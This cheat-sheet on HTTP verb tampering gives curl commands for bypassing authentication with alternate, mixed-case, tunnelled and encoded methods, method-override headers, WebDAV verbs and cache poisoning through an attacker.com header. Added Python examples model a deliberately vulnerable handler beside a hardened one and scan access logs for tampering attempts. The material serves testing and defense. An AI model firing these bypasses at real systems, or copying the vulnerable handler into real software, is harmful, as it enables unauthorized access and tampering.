HTTP Verb Tampering

Bypassing Basic Authentication

```bash
# Probe one protected path with each verb. A 401 on GET but a 200 on another
# verb means the access control is bound to specific methods, not to the resource.
curl -X GET http://target.com/restricted
curl -X POST http://target.com/restricted
curl -X PUT http://target.com/restricted
curl -X DELETE http://target.com/restricted
curl -X OPTIONS http://target.com/restricted
curl -I http://target.com/restricted      # HEAD; -I avoids curl waiting for a body HEAD never returns
curl -X TRACE http://target.com/restricted
```

Dangerous Verb Combinations

```bash
# Bypass with mixed case (-X sets the method; lowercase -x is curl's proxy flag)
curl -X gEt http://target.com/admin

# Null verb tunneling: the whole string lands on the request line, so a parser
# that stops at the first space sees a plain GET /admin
curl -X "GET /admin HTTP/1.1" http://target.com

# Verb spoofing via headers: the framework rewrites POST to PUT after the
# front-end authorization check has already passed it as a POST
curl -H "X-HTTP-Method-Override: PUT" -X POST http://target.com/update
```

WebDAV-Specific Exploits

```bash
# PROPFIND to enumerate directories (207 Multi-Status means WebDAV is live)
curl -X PROPFIND http://target.com/webdav/

# MKCOL to create directories
curl -X MKCOL http://target.com/new_folder

# SEARCH for file discovery; search.xml is a local DASL query body
curl -X SEARCH -H "Content-Type: text/xml" --data-binary @search.xml http://target.com
```

Automated Testing with Nmap

```bash
# http-methods lists what OPTIONS advertises and tests risky verbs;
# http-auth-finder locates paths that demand authentication
nmap -p 80,443 --script http-methods,http-auth-finder target.com
```

Advanced Exploitation Techniques

HTTP Method Override

```bash
# Using different override headers; frameworks differ in which name they honor
curl -H "X-HTTP-Method: DELETE" -X POST http://target.com/resource
curl -H "X-Method-Override: PUT" -X POST http://target.com/upload
```
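The basic-auth and override-header bypasses above share one root cause: authorization is attached to particular handlers (GET and POST) rather than to the route, and the method-override header is applied before that check. The following is an added example, not code from the original page: a minimal WSGI app modelling the weak pattern beside a hardened one (strict method allowlist answered with 405, authorization on every method, override header ignored), probed in-process with the same verb set the curl commands use. The `/restricted` path, the `admin:s3cret` credential and the function names are constructed for the demo.

```python
"""Verb-tampering weakness and its fix, modelled as two WSGI apps (added example)."""
import base64
from io import BytesIO

# Constructed demo credential; a real app would check a credential store.
VALID_USER = ("admin", "s3cret")
BASIC_OK = "Basic " + base64.b64encode(b"admin:s3cret").decode()


def _authorized(environ):
    """Return True if the Authorization header carries the demo credential."""
    header = environ.get("HTTP_AUTHORIZATION", "")
    if not header.startswith("Basic "):
        return False
    try:
        user, _, pwd = base64.b64decode(header[6:]).decode().partition(":")
    except (ValueError, UnicodeDecodeError):
        return False
    return (user, pwd) == VALID_USER


def vulnerable_app(environ, start_response):
    """Weak pattern: auth enforced only for GET/POST, override header honoured first."""
    method = environ["REQUEST_METHOD"]
    # The override header is applied before any authorization decision.
    method = environ.get("HTTP_X_HTTP_METHOD_OVERRIDE", method)
    if method in ("GET", "POST") and not _authorized(environ):
        start_response("401 Unauthorized", [("WWW-Authenticate", 'Basic realm="restricted"')])
        return [b"auth required"]
    # Every other verb (DELETE, PROPFIND, gEt, ...) falls straight through.
    start_response("200 OK", [("Content-Type", "text/plain")])
    return [f"handled {method} on /restricted".encode()]


def hardened_app(environ, start_response):
    """Fixed pattern: allowlist the verbs, authorize every request, ignore overrides."""
    method = environ["REQUEST_METHOD"]
    # 1. Anything that is not exactly one of the served verbs is refused.
    if method not in {"GET", "POST"}:
        start_response("405 Method Not Allowed", [("Allow", "GET, POST")])
        return [b""]
    # 2. Authorization runs for every allowed method, before anything else.
    if not _authorized(environ):
        start_response("401 Unauthorized", [("WWW-Authenticate", 'Basic realm="restricted"')])
        return [b"auth required"]
    # 3. X-HTTP-Method-Override is never consulted, so the real verb is used.
    start_response("200 OK", [("Content-Type", "text/plain")])
    return [f"handled {method} on /restricted".encode()]


def request(app, method, headers=None):
    """Drive a WSGI app in-process; return (status code, body) without a network."""
    environ = {"REQUEST_METHOD": method, "PATH_INFO": "/restricted", "wsgi.input": BytesIO(b"")}
    for name, value in (headers or {}).items():
        environ["HTTP_" + name.upper().replace("-", "_")] = value
    status = {}

    def start_response(status_line, response_headers, exc_info=None):
        status["code"] = int(status_line.split(" ", 1)[0])

    body = b"".join(app(environ, start_response))
    return status["code"], body


def probe(app):
    """Map each verb from the cheat-sheet (unauthenticated) to the status it gets."""
    verbs = ["GET", "POST", "PUT", "DELETE", "OPTIONS", "HEAD", "TRACE", "PROPFIND", "gEt"]
    results = {v: request(app, v)[0] for v in verbs}
    results["POST+override"] = request(app, "POST", {"X-HTTP-Method-Override": "DELETE"})[0]
    return results


def override_effect(app):
    """With valid credentials, report which verb the handler actually executed."""
    _, body = request(app, "POST", {"Authorization": BASIC_OK,
                                    "X-HTTP-Method-Override": "DELETE"})
    return body.decode()


if __name__ == "__main__":
    for name, app in (("vulnerable", vulnerable_app), ("hardened", hardened_app)):
        print(name, probe(app), override_effect(app))
```

Running it shows the vulnerable app answering 401 only to GET and POST while every other verb, and the overridden POST, reaches the handler; the hardened app returns 405 for anything outside the allowlist and 401 for unauthenticated GET/POST, and an authenticated POST stays a POST regardless of the override header.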

JSON API Exploitation

```bash
# Verb tampering in REST APIs: a GET carrying a JSON body whose "method" field
# some API layers treat as the real operation
curl -X GET -H "Content-Type: application/json" http://api.target.com/users \
  -d '{"method":"DELETE","id":123}'
```

Cache Poisoning Vectors

```bash
# Using HEAD to poison cache (-I sends HEAD; -X HEAD would leave curl waiting for a body)
curl -I -H "X-Forwarded-Host: attacker.com" http://target.com/static/logo.png
```

Defensive Bypass Techniques

```bash
# Bypassing WAFs with verb obfuscation. Inside double quotes bash does not decode
# these escapes, so the request line carries the literal characters; the question
# is whether the WAF and the origin normalise them the same way.
curl -X "G\u0045T" http://target.com/admin
curl -X "G%45T" http://target.com/admin
curl -X "G\x45T" http://target.com/admin
```

Detection Payloads

```bash
# Test for verb tampering vulnerabilities: a 405/501 means the method is
# validated; a 200 means unknown verbs fall through to a handler
curl -X "ARBITRARY" http://target.com -I
curl -X "JUNK" http://target.com -I
```
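Every request above leaves a trace in the web server's access log, so the same cheat-sheet doubles as a detection spec. The following is an added example, not from the original page: a scanner over combined-format access log lines that flags unknown verbs, case-mangled verbs, WebDAV verbs, request lines with extra fields (the tunnelling trick), and standard verbs used on a route whose allowlist excludes them, and records whether the server accepted (2xx) each one. The log lines, IP addresses and the `ROUTE_ALLOWLIST` are constructed for the demo.

```python
"""Flag verb-tampering attempts in combined-format access logs (added example)."""
import re
from collections import Counter

# Combined log format: ip ident user [time] "request-line" status bytes ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>[^"]*)" (?P<status>\d{3})')

# RFC 9110 methods; anything else is worth a look.
STANDARD = {"GET", "HEAD", "POST", "PUT", "DELETE", "CONNECT", "OPTIONS", "TRACE", "PATCH"}
# WebDAV methods (RFC 4918 plus the SEARCH extension); alert if WebDAV is not meant to be on.
WEBDAV = {"PROPFIND", "PROPPATCH", "MKCOL", "COPY", "MOVE", "LOCK", "UNLOCK", "SEARCH"}
# Constructed per-route allowlist; in practice generate it from the route table.
ROUTE_ALLOWLIST = {"/restricted": {"GET", "POST"}, "/admin": {"GET", "POST"}}

# Constructed sample log; the 203.0.113.5 client replays the cheat-sheet.
SAMPLE_LOG = """
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /restricted HTTP/1.1" 401 0
203.0.113.5 - - [10/Oct/2023:13:55:37 +0000] "DELETE /restricted HTTP/1.1" 200 512
203.0.113.5 - - [10/Oct/2023:13:55:38 +0000] "gEt /admin HTTP/1.1" 200 1024
203.0.113.5 - - [10/Oct/2023:13:55:39 +0000] "PROPFIND /webdav/ HTTP/1.1" 207 2048
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "ARBITRARY / HTTP/1.1" 501 0
198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /admin HTTP/1.1 / HTTP/1.1" 200 300
192.0.2.9 - - [10/Oct/2023:13:56:10 +0000] "POST /login HTTP/1.1" 302 0
"""


def classify(fields):
    """Return a reason string for a suspicious request line, or None if it looks normal."""
    if len(fields) != 3:
        # "GET /admin HTTP/1.1 / HTTP/1.1": a method string that smuggled a whole request line.
        return "malformed-request-line"
    method, path, _ = fields
    if method not in STANDARD:
        if method.upper() in STANDARD:
            return "case-mangled-method"
        if method.upper() in WEBDAV:
            return "webdav-method"
        return "unknown-method"
    allowed = ROUTE_ALLOWLIST.get(path)
    if allowed and method not in allowed:
        return "verb-outside-route-allowlist"
    return None


def scan_access_log(text):
    """Return (findings, per-client counter) for every suspicious line in the log text."""
    findings = []
    per_ip = Counter()
    for line in text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        fields = m["req"].split(" ")
        reason = classify(fields)
        if reason is None:
            continue
        status = int(m["status"])
        findings.append({
            "ip": m["ip"],
            "method": fields[0],
            "path": fields[1] if len(fields) > 1 else "",
            "status": status,
            "reason": reason,
            # A 2xx means the origin handled the odd verb instead of rejecting it.
            "accepted": 200 <= status < 300,
        })
        per_ip[m["ip"]] += 1
    return findings, per_ip


if __name__ == "__main__":
    found, by_ip = scan_access_log(SAMPLE_LOG)
    for f in found:
        flag = "ACCEPTED" if f["accepted"] else "rejected"
        print(f"{f['ip']:<14} {f['method']:<10} {f['path']:<12} {f['status']} {f['reason']} [{flag}]")
    print("per client:", dict(by_ip))
```

The `accepted` field is what turns a noisy alert into a real one: an unknown verb answered with 501 is a probe, while `DELETE /restricted` or `gEt /admin` answered with 200 is evidence the route lacks a method allowlist and needs the server-side fix.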